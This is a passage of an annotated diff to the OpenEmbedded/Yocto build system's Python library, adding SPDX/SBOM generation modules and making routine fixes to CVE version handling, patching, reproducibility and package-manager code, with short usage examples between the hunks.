+ to check vulnerabilities against a CVE in the database downloaded from NVD.
+
+ When the version has an update, i.e.
+ "p1" in OpenSSH 8.3p1,
+ "-rc1" in linux kernel 6.2-rc1,
+ the database stores the version as version_update (8.3_p1, 6.2_rc1).
+ Therefore, we must transform this version before comparing to the
+ recipe version.
+
+ In this case, the parameter of the function is 8.3_p1.
+ If the version uses the Release Candidate format, "rc",
+ this function replaces the '_' by '-'.
+ If the version uses the Update format, "p",
+ this function removes the '_' completely.
+ """
+ import re
+
+ matches = re.match('^([0-9.]+)_((p|rc)[0-9]+)$', version)
+
+ if not matches:
+ return version
+
+ version = matches.group(1)
+ update = matches.group(2)
+
+ if matches.group(3) == "rc":
+ return version + '-' + update
+
+ return version + update
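
The Version helper and the conversion/CPE functions above do not need the BitBake datastore, so their ordering and normalisation rules can be sanity-checked on their own. A minimal sketch, assuming this file is in place and meta/lib is on PYTHONPATH (the acme:widget product is made up for illustration):

    from oe.cve_check import Version, convert_cve_version, get_cpe_ids

    # with the "patch" suffix scheme an update such as p1 sorts after the base release
    assert Version("8.3p1", suffix="patch") > Version("8.3", suffix="patch")
    # release candidates sort before the final release
    assert Version("6.2-rc1") < Version("6.2")
    # NVD stores updates as version_update; convert back to the recipe (${PV}) form
    assert convert_cve_version("8.3_p1") == "8.3p1"
    assert convert_cve_version("6.2_rc1") == "6.2-rc1"
    # CVE_PRODUCT entries without an explicit vendor get a wildcard vendor in the CPE
    print(get_cpe_ids("openssh acme:widget", "8.3p1"))
    # ['cpe:2.3:a:*:openssh:8.3p1:*:*:*:*:*:*:*', 'cpe:2.3:a:acme:widget:8.3p1:*:*:*:*:*:*:*']
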
diff --git a/meta/lib/oe/gpg_sign.py b/meta/lib/oe/gpg_sign.py
index 7634d7ef1d..492f096eaa 100644
--- a/meta/lib/oe/gpg_sign.py
+++ b/meta/lib/oe/gpg_sign.py
@@ -111,7 +111,7 @@ class LocalSigner(object):
def verify(self, sig_file):
"""Verify signature"""
- cmd = self.gpg_cmd + [" --verify", "--no-permission-warning"]
+ cmd = self.gpg_cmd + ["--verify", "--no-permission-warning"]
if self.gpg_path:
cmd += ["--homedir", self.gpg_path]
diff --git a/meta/lib/oe/license.py b/meta/lib/oe/license.py
index c1274a61de..c4efbe142b 100644
--- a/meta/lib/oe/license.py
+++ b/meta/lib/oe/license.py
@@ -81,6 +81,9 @@ class FlattenVisitor(LicenseVisitor):
def visit_Str(self, node):
self.licenses.append(node.s)
+ def visit_Constant(self, node):
+ self.licenses.append(node.value)
+
def visit_BinOp(self, node):
if isinstance(node.op, ast.BitOr):
left = FlattenVisitor(self.choose_licenses)
@@ -234,6 +237,9 @@ class ListVisitor(LicenseVisitor):
def visit_Str(self, node):
self.licenses.add(node.s)
+ def visit_Constant(self, node):
+ self.licenses.add(node.value)
+
def list_licenses(licensestr):
"""Simply get a list of all licenses mentioned in a license string.
Binary operators are not applied or taken into account in any way"""
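
The visit_Constant additions keep the license visitors working on Python 3.8 and later, where string literals parse as ast.Constant rather than the deprecated ast.Str (removed in 3.12). A standalone sketch of the same pattern; LicenseCollector is a hypothetical stand-in, not part of oe.license:

    import ast

    class LicenseCollector(ast.NodeVisitor):
        def __init__(self):
            self.licenses = []

        def visit_Str(self, node):          # string literal nodes on Python < 3.8
            self.licenses.append(node.s)

        def visit_Constant(self, node):     # string literal nodes on Python >= 3.8
            if isinstance(node.value, str):
                self.licenses.append(node.value)

    v = LicenseCollector()
    # oe.license parses quoted license names joined by &/| operators
    v.visit(ast.parse('"GPL-2.0-only" | "MIT"'))
    print(v.licenses)   # ['GPL-2.0-only', 'MIT'] on both old and new interpreters
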
diff --git a/meta/lib/oe/package_manager.py b/meta/lib/oe/package_manager.py
index b0660411ea..502dfbe3ed 100644
--- a/meta/lib/oe/package_manager.py
+++ b/meta/lib/oe/package_manager.py
@@ -403,7 +403,7 @@ class PackageManager(object, metaclass=ABCMeta):
bb.utils.remove(self.intercepts_dir, True)
bb.utils.mkdirhier(self.intercepts_dir)
for intercept in postinst_intercepts:
- bb.utils.copyfile(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
+ shutil.copy(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
@abstractmethod
def _handle_intercept_failure(self, failed_script):
@@ -611,12 +611,13 @@ class PackageManager(object, metaclass=ABCMeta):
"'%s' returned %d:\n%s" %
(' '.join(cmd), e.returncode, e.output.decode("utf-8")))
- target_arch = self.d.getVar('TARGET_ARCH')
- localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
- if os.path.exists(localedir) and os.listdir(localedir):
- generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
- # And now delete the binary locales
- self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
+ if self.d.getVar('IMAGE_LOCALES_ARCHIVE') == '1':
+ target_arch = self.d.getVar('TARGET_ARCH')
+ localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
+ if os.path.exists(localedir) and os.listdir(localedir):
+ generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
+ # And now delete the binary locales
+ self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
def deploy_dir_lock(self):
if self.deploy_dir is None:
diff --git a/meta/lib/oe/packagedata.py b/meta/lib/oe/packagedata.py
index a82085a792..feb834c0e3 100644
--- a/meta/lib/oe/packagedata.py
+++ b/meta/lib/oe/packagedata.py
@@ -57,6 +57,17 @@ def read_subpkgdata_dict(pkg, d):
ret[newvar] = subd[var]
return ret
+def read_subpkgdata_extended(pkg, d):
+ import json
+ import gzip
+
+ fn = d.expand("${PKGDATA_DIR}/extended/%s.json.gz" % pkg)
+ try:
+ with gzip.open(fn, "rt", encoding="utf-8") as f:
+ return json.load(f)
+ except FileNotFoundError:
+ return None
+
def _pkgmap(d):
"""Return a dictionary mapping package to recipe name."""
diff --git a/meta/lib/oe/patch.py b/meta/lib/oe/patch.py
index 7ca2e28b1f..feb6ee7082 100644
--- a/meta/lib/oe/patch.py
+++ b/meta/lib/oe/patch.py
@@ -2,6 +2,9 @@
# SPDX-License-Identifier: GPL-2.0-only
#
+import os
+import shlex
+import subprocess
import oe.path
import oe.types
@@ -24,7 +27,6 @@ class CmdError(bb.BBHandledException):
def runcmd(args, dir = None):
- import pipes
import subprocess
if dir:
@@ -35,7 +37,7 @@ def runcmd(args, dir = None):
# print("cwd: %s -> %s" % (olddir, dir))
try:
- args = [ pipes.quote(str(arg)) for arg in args ]
+ args = [ shlex.quote(str(arg)) for arg in args ]
cmd = " ".join(args)
# print("cmd: %s" % cmd)
(exitstatus, output) = subprocess.getstatusoutput(cmd)
@@ -512,7 +514,7 @@ class GitApplyTree(PatchTree):
try:
shellcmd = [patchfilevar, "git", "--work-tree=%s" % reporoot]
self.gitCommandUserOptions(shellcmd, self.commituser, self.commitemail)
- shellcmd += ["am", "-3", "--keep-cr", "-p%s" % patch['strippath']]
+ shellcmd += ["am", "-3", "--keep-cr", "--no-scissors", "-p%s" % patch['strippath']]
return _applypatchhelper(shellcmd, patch, force, reverse, run)
except CmdError:
# Need to abort the git am, or we'll still be within it at the end
diff --git a/meta/lib/oe/path.py b/meta/lib/oe/path.py
index 082972457b..c8d8ad05b9 100644
--- a/meta/lib/oe/path.py
+++ b/meta/lib/oe/path.py
@@ -320,3 +320,24 @@ def which_wild(pathname, path=None, mode=os.F_OK, *, reverse=False, candidates=F
return files
+def canonicalize(paths, sep=','):
+ """Given a string with paths (separated by commas by default), expand
+ each path using os.path.realpath() and return the resulting paths as a
+ string (separated using the same separator as the original string).
+ """
+ # Ignore paths containing "$" as they are assumed to be unexpanded bitbake
+ # variables. Normally they would be ignored, e.g., when passing the paths
+ # through the shell they would expand to empty strings. However, when they
+ # are passed through os.path.realpath(), it will cause them to be prefixed
+ # with the absolute path to the current directory and thus not be empty
+ # anymore.
+ #
+ # Also maintain trailing slashes, as the paths may actually be used as
+ # prefixes in string comparisons later on, where the slashes are important.
+ canonical_paths = []
+ for path in (paths or '').split(sep):
+ if '$' not in path:
+ trailing_slash = path.endswith('/') and '/' or ''
+ canonical_paths.append(os.path.realpath(path) + trailing_slash)
+
+ return sep.join(canonical_paths)
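
A quick illustration of the behaviour described above, assuming meta/lib is on PYTHONPATH; the exact output depends on the filesystem (shown for a host where /usr/lib and /var are not symlinks):

    from oe.path import canonicalize

    # unexpanded ${...} entries are dropped, trailing slashes are preserved
    print(canonicalize("/usr/../usr/lib/,${TOPDIR}/deploy,/var/"))
    # -> "/usr/lib/,/var/"
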
diff --git a/meta/lib/oe/prservice.py b/meta/lib/oe/prservice.py
index 2d3c9c7e50..fcdbe66c19 100644
--- a/meta/lib/oe/prservice.py
+++ b/meta/lib/oe/prservice.py
@@ -3,10 +3,6 @@
#
def prserv_make_conn(d, check = False):
- # Otherwise this fails when called from recipes which e.g. inherit python3native (which sets _PYTHON_SYSCONFIGDATA_NAME) with:
- # No module named '_sysconfigdata'
- if '_PYTHON_SYSCONFIGDATA_NAME' in os.environ:
- del os.environ['_PYTHON_SYSCONFIGDATA_NAME']
import prserv.serv
host_params = list([_f for _f in (d.getVar("PRSERV_HOST") or '').split(':') if _f])
try:
diff --git a/meta/lib/oe/qa.py b/meta/lib/oe/qa.py
index ea831b930a..e8a854a302 100644
--- a/meta/lib/oe/qa.py
+++ b/meta/lib/oe/qa.py
@@ -156,6 +156,7 @@ def elf_machine_to_string(machine):
"""
try:
return {
+ 0x00: "Unset",
0x02: "SPARC",
0x03: "x86",
0x08: "MIPS",
diff --git a/meta/lib/oe/recipeutils.py b/meta/lib/oe/recipeutils.py
index fde1ad3ddd..f36a2fb0ac 100644
--- a/meta/lib/oe/recipeutils.py
+++ b/meta/lib/oe/recipeutils.py
@@ -409,7 +409,7 @@ def copy_recipe_files(d, tgt_dir, whole_dir=False, download=True, all_variants=F
fetch.download()
for pth in fetch.localpaths():
if pth not in localpaths:
- localpaths.append(pth)
+ localpaths.append(os.path.abspath(pth))
uri_values.append(srcuri)
fetch_urls(d)
diff --git a/meta/lib/oe/reproducible.py b/meta/lib/oe/reproducible.py
index 421bb12f54..1ed79b18ca 100644
--- a/meta/lib/oe/reproducible.py
+++ b/meta/lib/oe/reproducible.py
@@ -41,13 +41,13 @@ def find_git_folder(d, sourcedir):
for root, dirs, files in os.walk(workdir, topdown=True):
dirs[:] = [d for d in dirs if d not in exclude]
if '.git' in dirs:
- return root
+ return os.path.join(root, ".git")
bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir)
return None
def get_source_date_epoch_from_git(d, sourcedir):
- if not "git://" in d.getVar('SRC_URI'):
+ if not "git://" in d.getVar('SRC_URI') and not "gitsm://" in d.getVar('SRC_URI'):
return None
gitpath = find_git_folder(d, sourcedir)
@@ -62,7 +62,8 @@ def get_source_date_epoch_from_git(d, sourcedir):
return None
bb.debug(1, "git repository: %s" % gitpath)
- p = subprocess.run(['git', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'], check=True, stdout=subprocess.PIPE)
+ p = subprocess.run(['git', '-c', 'log.showSignature=false', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'],
+ check=True, stdout=subprocess.PIPE)
return int(p.stdout.decode('utf-8'))
def get_source_date_epoch_from_youngest_file(d, sourcedir):
@@ -90,8 +91,12 @@ def get_source_date_epoch_from_youngest_file(d, sourcedir):
bb.debug(1, "Newest file found: %s" % newest_file)
return source_date_epoch
-def fixed_source_date_epoch():
+def fixed_source_date_epoch(d):
bb.debug(1, "No tarball or git repo found to determine SOURCE_DATE_EPOCH")
+ source_date_epoch = d.getVar('SOURCE_DATE_EPOCH_FALLBACK')
+ if source_date_epoch:
+ bb.debug(1, "Using SOURCE_DATE_EPOCH_FALLBACK")
+ return int(source_date_epoch)
return 0
def get_source_date_epoch(d, sourcedir):
@@ -99,6 +104,6 @@ def get_source_date_epoch(d, sourcedir):
get_source_date_epoch_from_git(d, sourcedir) or
get_source_date_epoch_from_known_files(d, sourcedir) or
get_source_date_epoch_from_youngest_file(d, sourcedir) or
- fixed_source_date_epoch() # Last resort
+ fixed_source_date_epoch(d) # Last resort
)
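
The added -c log.showSignature=false matters when a user's global gitconfig enables signature display: gpg output would then precede the %ct value and the int() conversion would fail. A standalone sketch of the hardened call, with /tmp/src/.git standing in for the real checkout:

    import subprocess

    def commit_epoch(gitdir):
        # force signature display off so stdout is only the committer timestamp
        p = subprocess.run(['git', '-c', 'log.showSignature=false', '--git-dir', gitdir,
                            'log', '-1', '--pretty=%ct'],
                           check=True, stdout=subprocess.PIPE)
        return int(p.stdout.decode('utf-8'))

    print(commit_epoch('/tmp/src/.git'))
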
diff --git a/meta/lib/oe/rootfs.py b/meta/lib/oe/rootfs.py
index cd65e62030..5391c25af9 100644
--- a/meta/lib/oe/rootfs.py
+++ b/meta/lib/oe/rootfs.py
@@ -167,7 +167,7 @@ class Rootfs(object, metaclass=ABCMeta):
pass
os.rename(self.image_rootfs, self.image_rootfs + '-dbg')
- bb.note(" Restoreing original rootfs...")
+ bb.note(" Restoring original rootfs...")
os.rename(self.image_rootfs + '-orig', self.image_rootfs)
def _exec_shell_cmd(self, cmd):
@@ -304,7 +304,7 @@ class Rootfs(object, metaclass=ABCMeta):
def _check_for_kernel_modules(self, modules_dir):
for root, dirs, files in os.walk(modules_dir, topdown=True):
for name in files:
- found_ko = name.endswith(".ko")
+ found_ko = name.endswith((".ko", ".ko.gz", ".ko.xz"))
if found_ko:
return found_ko
return False
@@ -321,7 +321,9 @@ class Rootfs(object, metaclass=ABCMeta):
if not os.path.exists(kernel_abi_ver_file):
bb.fatal("No kernel-abiversion file found (%s), cannot run depmod, aborting" % kernel_abi_ver_file)
- kernel_ver = open(kernel_abi_ver_file).read().strip(' \n')
+ with open(kernel_abi_ver_file) as f:
+ kernel_ver = f.read().strip(' \n')
+
versioned_modules_dir = os.path.join(self.image_rootfs, modules_dir, kernel_ver)
bb.utils.mkdirhier(versioned_modules_dir)
diff --git a/meta/lib/oe/sbom.py b/meta/lib/oe/sbom.py
new file mode 100644
index 0000000000..22ed5070ea
--- /dev/null
+++ b/meta/lib/oe/sbom.py
@@ -0,0 +1,84 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import collections
+
+DepRecipe = collections.namedtuple("DepRecipe", ("doc", "doc_sha1", "recipe"))
+DepSource = collections.namedtuple("DepSource", ("doc", "doc_sha1", "recipe", "file"))
+
+
+def get_recipe_spdxid(d):
+ return "SPDXRef-%s-%s" % ("Recipe", d.getVar("PN"))
+
+
+def get_download_spdxid(d, idx):
+ return "SPDXRef-Download-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_package_spdxid(pkg):
+ return "SPDXRef-Package-%s" % pkg
+
+
+def get_source_file_spdxid(d, idx):
+ return "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_packaged_file_spdxid(pkg, idx):
+ return "SPDXRef-PackagedFile-%s-%d" % (pkg, idx)
+
+
+def get_image_spdxid(img):
+ return "SPDXRef-Image-%s" % img
+
+
+def get_sdk_spdxid(sdk):
+ return "SPDXRef-SDK-%s" % sdk
+
+
+def write_doc(d, spdx_doc, subdir, spdx_deploy=None, indent=None):
+ from pathlib import Path
+
+ if spdx_deploy is None:
+ spdx_deploy = Path(d.getVar("SPDXDEPLOY"))
+
+ dest = spdx_deploy / subdir / (spdx_doc.name + ".spdx.json")
+ dest.parent.mkdir(exist_ok=True, parents=True)
+ with dest.open("wb") as f:
+ doc_sha1 = spdx_doc.to_json(f, sort_keys=True, indent=indent)
+
+ l = spdx_deploy / "by-namespace" / spdx_doc.documentNamespace.replace("/", "_")
+ l.parent.mkdir(exist_ok=True, parents=True)
+ l.symlink_to(os.path.relpath(dest, l.parent))
+
+ return doc_sha1
+
+
+def read_doc(fn):
+ import hashlib
+ import oe.spdx
+ import io
+ import contextlib
+
+ @contextlib.contextmanager
+ def get_file():
+ if isinstance(fn, io.IOBase):
+ yield fn
+ else:
+ with fn.open("rb") as f:
+ yield f
+
+ with get_file() as f:
+ sha1 = hashlib.sha1()
+ while True:
+ chunk = f.read(4096)
+ if not chunk:
+ break
+ sha1.update(chunk)
+
+ f.seek(0)
+ doc = oe.spdx.SPDXDocument.from_json(f)
+
+ return (doc, sha1.hexdigest())
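
read_doc() accepts either an already-open binary stream or a pathlib.Path and returns the parsed document together with the SHA-1 of its serialized form, which the DepRecipe/DepSource tuples above carry around. A minimal round trip, assuming meta/lib is on PYTHONPATH:

    import io
    import oe.sbom
    import oe.spdx

    doc = oe.spdx.SPDXDocument(name="demo")
    buf = io.BytesIO()
    doc.to_json(buf)
    buf.seek(0)

    loaded, sha1 = oe.sbom.read_doc(buf)    # a pathlib.Path to a .spdx.json file works too
    print(loaded.name, sha1)                # "demo" plus the hex digest of the JSON
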
diff --git a/meta/lib/oe/spdx.py b/meta/lib/oe/spdx.py
new file mode 100644
index 0000000000..7aaf2af5ed
--- /dev/null
+++ b/meta/lib/oe/spdx.py
@@ -0,0 +1,357 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+#
+# This library is intended to capture the JSON SPDX specification in a type
+# safe manner. It is not intended to encode any particular OE-specific
+# behaviors; see sbom.py for that.
+#
+# The published SPDX specification doesn't spell out the JSON syntax for
+# every field, which can make it hard to determine what the JSON should look
+# like. I've found it is actually much simpler to read the official
+# SPDX JSON schema which can be found here: https://github.com/spdx/spdx-spec
+# in schemas/spdx-schema.json
+#
+
+import hashlib
+import itertools
+import json
+
+SPDX_VERSION = "2.2"
+
+
+#
+# The following are the support classes that are used to implement SPDX object
+#
+
+class _Property(object):
+ """
+ A generic SPDX object property. The different types will derive from this
+ class
+ """
+
+ def __init__(self, *, default=None):
+ self.default = default
+
+ def setdefault(self, dest, name):
+ if self.default is not None:
+ dest.setdefault(name, self.default)
+
+
+class _String(_Property):
+ """
+ A scalar string property for an SPDX object
+ """
+
+ def __init__(self, **kwargs):
+ super().__init__(**kwargs)
+
+ def set_property(self, attrs, name):
+ def get_helper(obj):
+ return obj._spdx[name]
+
+ def set_helper(obj, value):
+ obj._spdx[name] = value
+
+ def del_helper(obj):
+ del obj._spdx[name]
+
+ attrs[name] = property(get_helper, set_helper, del_helper)
+
+ def init(self, source):
+ return source
+
+
+class _Object(_Property):
+ """
+ A scalar SPDX object as a property of another SPDX object
+ """
+
+ def __init__(self, cls, **kwargs):
+ super().__init__(**kwargs)
+ self.cls = cls
+
+ def set_property(self, attrs, name):
+ def get_helper(obj):
+ if not name in obj._spdx:
+ obj._spdx[name] = self.cls()
+ return obj._spdx[name]
+
+ def set_helper(obj, value):
+ obj._spdx[name] = value
+
+ def del_helper(obj):
+ del obj._spdx[name]
+
+ attrs[name] = property(get_helper, set_helper)
+
+ def init(self, source):
+ return self.cls(**source)
+
+
+class _ListProperty(_Property):
+ """
+ A list of SPDX properties
+ """
+
+ def __init__(self, prop, **kwargs):
+ super().__init__(**kwargs)
+ self.prop = prop
+
+ def set_property(self, attrs, name):
+ def get_helper(obj):
+ if not name in obj._spdx:
+ obj._spdx[name] = []
+ return obj._spdx[name]
+
+ def set_helper(obj, value):
+ obj._spdx[name] = list(value)
+
+ def del_helper(obj):
+ del obj._spdx[name]
+
+ attrs[name] = property(get_helper, set_helper, del_helper)
+
+ def init(self, source):
+ return [self.prop.init(o) for o in source]
+
+
+class _StringList(_ListProperty):
+ """
+ A list of strings as a property for an SPDX object
+ """
+
+ def __init__(self, **kwargs):
+ super().__init__(_String(), **kwargs)
+
+
+class _ObjectList(_ListProperty):
+ """
+ A list of SPDX objects as a property for an SPDX object
+ """
+
+ def __init__(self, cls, **kwargs):
+ super().__init__(_Object(cls), **kwargs)
+
+
+class MetaSPDXObject(type):
+ """
+ A metaclass that allows properties (anything derived from a _Property
+ class) to be defined for a SPDX object
+ """
+ def __new__(mcls, name, bases, attrs):
+ attrs["_properties"] = {}
+
+ for key in attrs.keys():
+ if isinstance(attrs[key], _Property):
+ prop = attrs[key]
+ attrs["_properties"][key] = prop
+ prop.set_property(attrs, key)
+
+ return super().__new__(mcls, name, bases, attrs)
+
+
+class SPDXObject(metaclass=MetaSPDXObject):
+ """
+ The base SPDX object; all SPDX spec classes must derive from this class
+ """
+ def __init__(self, **d):
+ self._spdx = {}
+
+ for name, prop in self._properties.items():
+ prop.setdefault(self._spdx, name)
+ if name in d:
+ self._spdx[name] = prop.init(d[name])
+
+ def serializer(self):
+ return self._spdx
+
+ def __setattr__(self, name, value):
+ if name in self._properties or name == "_spdx":
+ super().__setattr__(name, value)
+ return
+ raise KeyError("%r is not a valid SPDX property" % name)
+
+#
+# These are the SPDX objects implemented from the spec. The *only* properties
+# that can be added to these objects are ones directly specified in the SPDX
+# spec, however you may add helper functions to make operations easier.
+#
+# Defaults should *only* be specified if the SPDX spec says there is a certain
+# required value for a field (e.g. dataLicense), or if the field is mandatory
+# and has a sane "this field is unknown" value (e.g. "NOASSERTION")
+#
+
+class SPDXAnnotation(SPDXObject):
+ annotationDate = _String()
+ annotationType = _String()
+ annotator = _String()
+ comment = _String()
+
+class SPDXChecksum(SPDXObject):
+ algorithm = _String()
+ checksumValue = _String()
+
+
+class SPDXRelationship(SPDXObject):
+ spdxElementId = _String()
+ relatedSpdxElement = _String()
+ relationshipType = _String()
+ comment = _String()
+ annotations = _ObjectList(SPDXAnnotation)
+
+
+class SPDXExternalReference(SPDXObject):
+ referenceCategory = _String()
+ referenceType = _String()
+ referenceLocator = _String()
+
+
+class SPDXPackageVerificationCode(SPDXObject):
+ packageVerificationCodeValue = _String()
+ packageVerificationCodeExcludedFiles = _StringList()
+
+
+class SPDXPackage(SPDXObject):
+ ALLOWED_CHECKSUMS = [
+ "SHA1",
+ "SHA224",
+ "SHA256",
+ "SHA384",
+ "SHA512",
+ "MD2",
+ "MD4",
+ "MD5",
+ "MD6",
+ ]
+
+ name = _String()
+ SPDXID = _String()
+ versionInfo = _String()
+ downloadLocation = _String(default="NOASSERTION")
+ supplier = _String(default="NOASSERTION")
+ homepage = _String()
+ licenseConcluded = _String(default="NOASSERTION")
+ licenseDeclared = _String(default="NOASSERTION")
+ summary = _String()
+ description = _String()
+ sourceInfo = _String()
+ copyrightText = _String(default="NOASSERTION")
+ licenseInfoFromFiles = _StringList(default=["NOASSERTION"])
+ externalRefs = _ObjectList(SPDXExternalReference)
+ packageVerificationCode = _Object(SPDXPackageVerificationCode)
+ hasFiles = _StringList()
+ packageFileName = _String()
+ annotations = _ObjectList(SPDXAnnotation)
+ checksums = _ObjectList(SPDXChecksum)
+
+
+class SPDXFile(SPDXObject):
+ SPDXID = _String()
+ fileName = _String()
+ licenseConcluded = _String(default="NOASSERTION")
+ copyrightText = _String(default="NOASSERTION")
+ licenseInfoInFiles = _StringList(default=["NOASSERTION"])
+ checksums = _ObjectList(SPDXChecksum)
+ fileTypes = _StringList()
+
+
+class SPDXCreationInfo(SPDXObject):
+ created = _String()
+ licenseListVersion = _String()
+ comment = _String()
+ creators = _StringList()
+
+
+class SPDXExternalDocumentRef(SPDXObject):
+ externalDocumentId = _String()
+ spdxDocument = _String()
+ checksum = _Object(SPDXChecksum)
+
+
+class SPDXExtractedLicensingInfo(SPDXObject):
+ name = _String()
+ comment = _String()
+ licenseId = _String()
+ extractedText = _String()
+
+
+class SPDXDocument(SPDXObject):
+ spdxVersion = _String(default="SPDX-" + SPDX_VERSION)
+ dataLicense = _String(default="CC0-1.0")
+ SPDXID = _String(default="SPDXRef-DOCUMENT")
+ name = _String()
+ documentNamespace = _String()
+ creationInfo = _Object(SPDXCreationInfo)
+ packages = _ObjectList(SPDXPackage)
+ files = _ObjectList(SPDXFile)
+ relationships = _ObjectList(SPDXRelationship)
+ externalDocumentRefs = _ObjectList(SPDXExternalDocumentRef)
+ hasExtractedLicensingInfos = _ObjectList(SPDXExtractedLicensingInfo)
+
+ def __init__(self, **d):
+ super().__init__(**d)
+
+ def to_json(self, f, *, sort_keys=False, indent=None, separators=None):
+ class Encoder(json.JSONEncoder):
+ def default(self, o):
+ if isinstance(o, SPDXObject):
+ return o.serializer()
+
+ return super().default(o)
+
+ sha1 = hashlib.sha1()
+ for chunk in Encoder(
+ sort_keys=sort_keys,
+ indent=indent,
+ separators=separators,
+ ).iterencode(self):
+ chunk = chunk.encode("utf-8")
+ f.write(chunk)
+ sha1.update(chunk)
+
+ return sha1.hexdigest()
+
+ @classmethod
+ def from_json(cls, f):
+ return cls(**json.load(f))
+
+ def add_relationship(self, _from, relationship, _to, *, comment=None, annotation=None):
+ if isinstance(_from, SPDXObject):
+ from_spdxid = _from.SPDXID
+ else:
+ from_spdxid = _from
+
+ if isinstance(_to, SPDXObject):
+ to_spdxid = _to.SPDXID
+ else:
+ to_spdxid = _to
+
+ r = SPDXRelationship(
+ spdxElementId=from_spdxid,
+ relatedSpdxElement=to_spdxid,
+ relationshipType=relationship,
+ )
+
+ if comment is not None:
+ r.comment = comment
+
+ if annotation is not None:
+ r.annotations.append(annotation)
+
+ self.relationships.append(r)
+
+ def find_by_spdxid(self, spdxid):
+ for o in itertools.chain(self.packages, self.files):
+ if o.SPDXID == spdxid:
+ return o
+ return None
+
+ def find_external_document_ref(self, namespace):
+ for r in self.externalDocumentRefs:
+ if r.spdxDocument == namespace:
+ return r
+ return None
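
Because MetaSPDXObject turns every _Property class attribute into a real Python property backed by the object's _spdx dict, documents can be built attribute by attribute and serialized without per-class JSON code. A short sketch of how the classes compose, again assuming meta/lib is on PYTHONPATH (all field values are made up):

    import io
    from oe.spdx import SPDXDocument, SPDXPackage

    doc = SPDXDocument(name="recipe-example")
    doc.creationInfo.created = "2021-01-01T00:00:00Z"

    pkg = SPDXPackage(name="example", versionInfo="1.0", SPDXID="SPDXRef-Package-example")
    doc.packages.append(pkg)
    doc.add_relationship(doc, "DESCRIBES", pkg)

    buf = io.BytesIO()
    doc.to_json(buf, sort_keys=True)   # mandatory defaults (dataLicense, ...) are filled in automatically
    buf.seek(0)

    restored = SPDXDocument.from_json(buf)
    assert restored.find_by_spdxid("SPDXRef-Package-example").versionInfo == "1.0"
    # unknown attributes are rejected up front:
    #   doc.licence = "MIT"   ->   KeyError: "'licence' is not a valid SPDX property"
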
diff --git a/meta/lib/oe/sstatesig.py b/meta/lib/oe/sstatesig.py
index d5a6200562..65bb4efe25 100644
--- a/meta/lib/oe/sstatesig.py
+++ b/meta/lib/oe/sstatesig.py
@@ -434,7 +434,7 @@ def find_sstate_manifest(taskdata, taskdata2, taskname, d, multilibcache):
d2 = multilibcache[variant]
if taskdata.endswith("-native"):
- pkgarchs = ["${BUILD_ARCH}"]
+ pkgarchs = ["${BUILD_ARCH}", "${BUILD_ARCH}_${ORIGNATIVELSBSTRING}"]
elif taskdata.startswith("nativesdk-"):
pkgarchs = ["${SDK_ARCH}_${SDK_OS}", "allarch"]
elif "-cross-canadian" in taskdata:
@@ -477,9 +477,13 @@ def OEOuthashBasic(path, sigfile, task, d):
h = hashlib.sha256()
prev_dir = os.getcwd()
include_owners = os.environ.get('PSEUDO_DISABLED') == '0'
+ if "package_write_" in task or task == "package_qa":
+ include_owners = False
include_timestamps = False
+ include_root = True
if task == "package":
include_timestamps = d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1'
+ include_root = False
extra_content = d.getVar('HASHEQUIV_HASH_VERSION')
try:
@@ -550,9 +554,11 @@ def OEOuthashBasic(path, sigfile, task, d):
try:
update_hash(" %10s" % pwd.getpwuid(s.st_uid).pw_name)
update_hash(" %10s" % grp.getgrgid(s.st_gid).gr_name)
- except KeyError:
+ except KeyError as e:
bb.warn("KeyError in %s" % path)
- raise
+ msg = ("KeyError: %s\nPath %s is owned by uid %d, gid %d, which doesn't match "
+ "any user/group on target. This may be due to host contamination." % (e, path, s.st_uid, s.st_gid))
+ raise Exception(msg).with_traceback(e.__traceback__)
if include_timestamps:
update_hash(" %10d" % s.st_mtime)
@@ -588,7 +594,8 @@ def OEOuthashBasic(path, sigfile, task, d):
update_hash("\n")
# Process this directory and all its child files
- process(root)
+ if include_root or root != ".":
+ process(root)
for f in files:
if f == 'fixmepath':
continue
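
The ownership hunk above swaps the bare KeyError re-raise for a new exception that explains the likely cause while keeping the original traceback via with_traceback(). The same idiom in isolation; owner_name is a hypothetical helper and the uid is chosen to be absent:

    import pwd

    def owner_name(uid):
        try:
            return pwd.getpwuid(uid).pw_name
        except KeyError as e:
            msg = ("KeyError: %s\nuid %d has no entry on this host, which usually "
                   "points at host contamination." % (e, uid))
            # re-raise with a descriptive message but the original traceback intact
            raise Exception(msg).with_traceback(e.__traceback__)

    owner_name(4242424)
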
diff --git a/meta/lib/oe/terminal.py b/meta/lib/oe/terminal.py
index eb10a6e33e..a0c166d884 100644
--- a/meta/lib/oe/terminal.py
+++ b/meta/lib/oe/terminal.py
@@ -102,6 +102,10 @@ class Rxvt(XTerminal):
command = 'rxvt -T "{title}" -e {command}'
priority = 1
+class URxvt(XTerminal):
+ command = 'urxvt -T "{title}" -e {command}'
+ priority = 1
+
class Screen(Terminal):
command = 'screen -D -m -t "{title}" -S devshell {command}'
@@ -163,7 +167,12 @@ class Tmux(Terminal):
# devshells, if it's already there, add a new window to it.
window_name = 'devshell-%i' % os.getpid()
- self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'.format(window_name)
+ self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'
+ if not check_tmux_version('1.9'):
+ # `tmux new-session -c` was added in 1.9;
+ # older versions fail with that flag
+ self.command = 'tmux new -d -s {0} -n {0} "{{command}}"'
+ self.command = self.command.format(window_name)
Terminal.__init__(self, sh_cmd, title, env, d)
